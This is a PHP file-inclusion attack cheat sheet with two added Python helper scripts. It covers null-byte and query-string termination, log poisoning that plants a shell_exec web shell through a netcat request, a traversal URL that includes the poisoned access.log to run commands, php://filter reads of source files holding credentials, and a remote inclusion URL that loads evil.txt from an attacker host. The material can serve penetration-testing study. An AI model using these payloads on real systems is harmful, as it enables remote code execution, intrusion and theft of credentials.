File inclusions (LFI, RFI)

A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.

-- Wikipedia

PHP settings

PHP Sicherheit: Local & Remote File Inclusion - Webmaster Tipps

  • allow_url_include: whether include, require, include_once and require_once accept URL wrappers such as http:// and ftp://. Off by default since PHP 5.2; it must be On for remote file inclusion to work.

  • allow_url_fopen: whether fopen()-style functions may open URLs. On by default and a prerequisite for allow_url_include, but on its own it does not let include() load remote files.

String termination

Example:

include("path/" . $_GET['FILE'] . ".php");

To get rid of the enforced .php extension, the string has to be terminated before the suffix is appended. Two ways to achieve that:

1. Null byte poisoning

Terminate the string with a null byte (%00). PHP < 5.3.4 handed the path to the C library, whose open() stops at the first NUL, so everything after it (including the appended .php) is dropped. Since PHP 5.3.4 include() rejects paths containing a null byte, and where magic_quotes_gpc is enabled the byte is escaped before it reaches the script.

filename.txt%00

2. Query parameter

Append a query string.

filename.txt?bla=

The above example then becomes path/filename.txt?bla=.php. This only helps when the attacker-controlled value is the start of the include path and names a URL (the RFI case, which needs allow_url_include), because only a stream wrapper such as http:// treats ? as a query separator: the remote server ignores bla=.php and returns the file. For a local path the ? is just another character in the filename and the include simply fails.
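The probe below is an added example, not code from the original page. It tries both termination techniques against a parameter that feeds the include() shown above and reports which one returned a marker string from the target file. The "target" it talks to is a constructed stand-in for `include("path/" . $_GET['FILE'] . ".php");` so the script runs offline; the parameter name FILE, the marker, the fake filesystem and the hostname are assumptions. On an engagement `fetch` would be a real HTTP client returning the response body.

```python
import urllib.parse
from typing import Callable, Dict

# Added example, not from the original page.  The target below is a
# constructed stand-in for  include("path/" . $_GET['FILE'] . ".php");
TARGET = "../../../../etc/passwd"
MARKER = "root:"                      # proves the file was read, not just opened

# Constructed fake filesystem: literal lookup, no real path resolution.
FAKE_FS = {
    "path/../../../../etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
    "path/index.php": "<?php echo 'hi'; ?>",
}

def fake_php(url: str, null_byte_truncates: bool) -> str:
    """Model of the vulnerable include().  null_byte_truncates=True mimics
    PHP < 5.3.4, where the C-level open() stops at the first NUL."""
    query = urllib.parse.urlparse(url).query
    value = urllib.parse.parse_qs(query, keep_blank_values=True)["FILE"][0]
    path = "path/" + value + ".php"
    if "\x00" in path:
        if not null_byte_truncates:   # PHP >= 5.3.4 refuses the path
            return "Warning: include(): Filename contains null byte"
        path = path.split("\x00", 1)[0]
    # For a local path '?' is just another character, so the query-string
    # trick leaves the ".php" suffix in place.
    return FAKE_FS.get(path, f"Warning: include({path}): failed to open stream")

def candidate_payloads(path: str) -> Dict[str, str]:
    return {
        "plain":     path,             # control: becomes path.php, must fail
        "null_byte": path + "%00",     # truncation on PHP < 5.3.4
        "query":     path + "?bla=",   # only meaningful for URL wrappers (RFI)
    }

def probe(base_url: str, param: str, fetch: Callable[[str], str]) -> Dict[str, bool]:
    """Try each termination technique; True means the marker came back."""
    results = {}
    for name, payload in candidate_payloads(TARGET).items():
        # Do not run the payload through quote(): it would turn %00 into
        # %2500 and the null byte would never reach PHP.
        results[name] = MARKER in fetch(f"{base_url}?{param}={payload}")
    return results

if __name__ == "__main__":
    old = lambda u: fake_php(u, null_byte_truncates=True)
    new = lambda u: fake_php(u, null_byte_truncates=False)
    print("PHP < 5.3.4 :", probe("http://target/inc.php", "FILE", old))
    print("PHP >= 5.3.4:", probe("http://target/inc.php", "FILE", new))
```

Against the old-PHP model only the null byte succeeds; against the new one nothing does, which is the expected result for a local include and the reason the query trick is reserved for the RFI case.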

Local File Inclusion (LFI)

See also Directory traversal.

Log file poisoning

If requests are written to a log file and you can make a PHP script include that log (LFI), any PHP you placed in an earlier request is interpreted when the log is included, which gives remote code execution (RCE).

Example

Connect to the target web server with netcat rather than a browser: netcat sends the request exactly as typed, whereas a browser percent-encodes < and ?, so the tag would land in the log encoded and never execute.

nc -nv <ip> <port>

Send a request that carries the PHP below, for example in the User-Agent header; Apache writes it verbatim into access.log.

<?php echo shell_exec($_GET['cmd']); ?>

Include the log through the LFI to gain RCE. The cmd parameter is read by the stager now embedded in the log, and the null byte strips the appended .php (PHP < 5.3.4). Every request, including this one, is logged as well, so poison the log only once.

http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Read source files

Wrap the file in the php://filter stream wrapper with a base64 encoding filter: the interpreter returns the file's bytes base64-encoded instead of executing them, so decoding the output recovers the PHP source (configuration files with credentials are the usual target). The appended .php suffix simply becomes part of the resource name, so no string termination is needed to read .php files this way.

php://filter/convert.base64-encode/resource=<file>
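As an added example (not code from the original page), the snippet below builds the filter URL and decodes the base64 blob out of a response body. The blob normally sits inside the application's HTML template, so the longest base64-looking run is extracted before decoding and padding is repaired in case the template mangled it. The sample source file and response are constructed; the parameter name and base URL are assumptions.

```python
import base64
import re

# Added example, not from the original page.
def filter_url(base: str, param: str, target: str) -> str:
    """URL that makes include() return `target` base64-encoded instead of running it."""
    return f"{base}?{param}=php://filter/convert.base64-encode/resource={target}"

# Base64 alphabet runs of at least 16 chars with optional padding.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_filter_response(body: str) -> str:
    """Pull the encoded file out of the surrounding HTML and decode it."""
    runs = _B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=len)            # the file is the longest run
    blob += "=" * (-len(blob) % 4)       # restore padding if the template ate it
    return base64.b64decode(blob).decode("utf-8", errors="replace")

# Constructed sample: the "source file" and the page it would come back in.
SOURCE = "<?php\n$db_pass = 'hunter2';\n?>\n"
SAMPLE_RESPONSE = ("<html><body><div class=\"content\">"
                   + base64.b64encode(SOURCE.encode()).decode()
                   + "</div></body></html>")

if __name__ == "__main__":
    print(filter_url("http://website.com/addguestbook.php", "LANG", "config"))
    print(decode_filter_response(SAMPLE_RESPONSE))
```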

Remote File Inclusion (RFI)

With allow_url_include enabled, the include path can point at a file on an attacker-controlled host. The payload is served as .txt rather than .php so the attacker's own server does not execute it, and the null byte (or the ?bla= trick from the string termination section) strips the enforced extension.

http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00
